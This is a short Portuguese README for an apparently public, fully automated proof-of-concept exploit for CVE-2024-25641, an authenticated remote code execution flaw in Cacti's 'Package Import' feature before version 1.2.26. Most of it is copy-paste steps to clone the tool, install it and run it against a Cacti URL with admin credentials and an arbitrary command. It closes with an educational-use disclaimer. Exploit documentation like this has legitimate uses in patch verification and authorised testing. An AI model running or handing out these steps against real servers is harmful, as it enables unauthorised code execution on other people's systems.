
PoC totalmente automatizado - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
RCE autenticadoVersão do Cacti < v1.2.26Uma vulnerabilidade de escrita arbitrária de arquivo, explorável através do recurso "Package Import", permite que usuários autenticados com a permissão "Import Templates" executem código PHP arbitrário no servidor web (RCE).

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
pip install -r requirements.txt
python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
poetry install
poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
Esta ferramenta é destinada apenas para fins educacionais e de teste. O autor desta ferramenta não se responsabiliza por qualquer uso indevido ou atividades ilegais realizadas com ela. Use esta ferramenta apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal e antiético.